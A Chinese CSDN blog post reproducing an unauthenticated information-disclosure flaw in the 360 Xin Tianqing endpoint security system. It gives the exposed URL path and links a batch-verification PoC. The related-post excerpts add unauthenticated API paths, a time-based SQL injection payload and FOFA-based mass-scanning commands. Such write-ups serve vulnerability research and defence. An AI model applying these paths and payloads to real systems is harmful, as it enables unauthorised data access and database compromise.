360新天擎终端安全系统信息泄露漏洞及poc脚本批量验证

最新推荐文章于 2024-07-31 11:16:10 发布
最新推荐文章于 2024-07-31 11:16:10 发布
阅读量1.4k 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43802646/article/details/132889165
版权

漏洞描述

360新天擎终端安全系统是面向行政单位的一系列产品安全处理方案,该终端安全系统存在未授权访问漏洞,导致一定敏感信息泄露。

漏洞原理

需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。未授权访问漏洞是常见的攻击入口点,某些严重的未授权访问会直接导致 getshell。

漏洞复现

http://ip:port/runtime/admin_log_conf.cache

poc工具:GitHub - zljun5057/-poc-: 360新天擎终端安全系统信息泄露POC

git clone GitHub - zljun5057/-poc-: 360新天擎终端安全系统信息泄露POC

(原创作者,仅供学习。禁止商用,违法使用)

被常威殴打的来福
关注
天擎终端安全管理系统未授权访问&SQL注入漏洞
千寻的博客
05-06 3419
文章目录漏洞名称漏洞描述影响版本FOFA漏洞复现未授权复现第一步 查看漏洞点第二步 查看越权访问sql注入复现第一步 sql注入点第二步 延时注入修复建议 漏洞名称 天擎终端安全管理系统未授权访问&SQL注入漏洞 漏洞描述 天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。 该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护; 天擎终端安全管理系统存在未
CNVD-2020-62853 360天擎终端安全管理系统越权访问漏洞复现
afei001
04-24 2049
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 FOFA实战复现 4.2 360_Day-with_Unauthorized_POC-2.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 360天擎终端安全管理系统,以大数据技术为支撑、以可靠服务为保障,它能够为用户精确检测已知病毒木马、未知恶意代码,有效防御APT攻击,并提供终端资产管理、漏洞补丁管理、安全运维管控、...
漏洞复现】360天擎 - 未授权与sql注入
最新发布
失心少年
07-31 190
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!比较推荐的方式先测试是否存在数据库信息泄露,存在的话大概率存在SQL注入。路由后拼接/api/dbstat/gettablessize。360天擎 - 未授权与sql注入。
2021HW — 360天擎漏洞
战神/calmness的博客
04-13 3810
FOFA搜索 1、未授权访问 http://X.X.X.X/api/dbstat/gettablessize 2、未授权访问 3、延时注入 http://1XXXX/api/dp/rptsvcsyncpoint?ccid= GET /api/dp/rptsvcsyncpoint?ccid=';SELECT PG_SLEEP(5)-- HTTP/1.1 Host: XXXXXXXXXXX Cache-Control: max-age=0 Upgrade-Ins.
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞
m0_46699477的博客
07-19 2309
奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带反序列化入口点,攻击者可执行任意代码获取服务器权限。
漏洞复现】奇安信-360天擎终端管理系统-rptsvr-任意文件上传
知黑而守白
01-18 673
360天擎终端安全管理系统360面向政府、企业、金融、军队、医疗、教育、制造业等大型企事业单位推出的集防病毒与终端安全管控于一体的解决方案。360天擎终端安全管理系统,以大数据技术为支撑、以可靠服务为保障,它能够为用户精确检测已知病毒木马、未知恶意代码,有效防御APT攻击,并提供终端资产管理、漏洞补丁管理、安全运维管控、网络安全准入、移动存储管理、终端安全审计、XP盾甲防护诸多功能。
奇安信360天擎rptsvcsyncpoint和getsimilarlistSQL SQL注入漏洞
weixin_43567873的博客
03-09 221
奇安信360天擎rptsvcsyncpoint和getsimilarlistSQL SQL注入漏洞
360新天擎数据库及表未授权访问漏洞exp
06-26
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有360新天擎相关资产 python3 fofa-cwillchris.py -k title="360新天擎" 将上面爬取到的文件(一般是final****.txt)..../360新天擎数据库及表未授权.bin -l 1.txt
奇安信天擎终端安全管理系统管理员手册
04-26
在产品主要功能部分,本手册详细介绍了奇安信天擎终端安全管理系统的主要功能,包括终端安全管理、恶意代码检测、网络攻击防护、数据加密、身份验证等。这些功能可以帮助管理员更好地管理和保护终端设备和数据。 ...
奇安信天擎终端安全管理系统V10.2.0.1200-产品白皮书(公开版).pdf
12-21
奇安信天擎终端安全管理系统的核心特性可能包括实时监控、威胁检测、防护策略制定、安全事件响应、系统漏洞管理、恶意代码查杀以及对未知威胁的智能分析等。系统可能采用了先进的威胁情报和机器学习技术,以提高对新...
奇安信360天擎getsimilarlist存在SQL注入漏洞
holyxp的博客
11-09 1041
奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。通过“体系化防御、数字化运营”方法,帮助政企客户准确识别、保护和监管终端,并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务 [1] 。 [2] 天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能
wgpsec#peiqi-wiki#天擎 未授权越权访问1
07-25
天擎 数据库信息泄露漏洞漏洞描述天擎 存在未授权越权访问,造成敏感信息泄露漏洞影响天擎漏洞复现已上传
漏洞复现--奇安信360天擎未授权访问
qq_53003652的博客
11-10 816
天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。该产品存在未授权访问,可造成数据库信息泄露
漏洞复现--奇安信360天擎rptsvcsyncpointSQL注入
qq_53003652的博客
11-10 907
天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。该产品存在SQL注入漏洞,攻击者可通过此漏洞获取服务器权限。注入点在ccid,且数据库为PostgreSQL。
360新天擎未授权访问数据库名及表名漏洞exp
Cwillchris的博客
06-26 705
python3 fofa-cwillchris.py -k title="360新天擎"将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。./360新天擎数据库及表未授权.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
奇安信360天擎rptsvcsyncpoint和getsimilarlistSQL SQL注入漏洞(含批量验证poc
2301_82101171的博客
04-16 348
天擎 rptsvcsyncpoint 存在SQL注入漏洞
天擎终端安全管理系统clientinfobymid存在SQL注入漏洞
3tefanie丶zhou的博客
12-29 1468
【故事、故事,便是故去的事情了,多说无益。】
奇安信 天擎 rptsvr 任意文件上传漏洞
Keepb1ue的博客
01-17 1464
奇安信天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值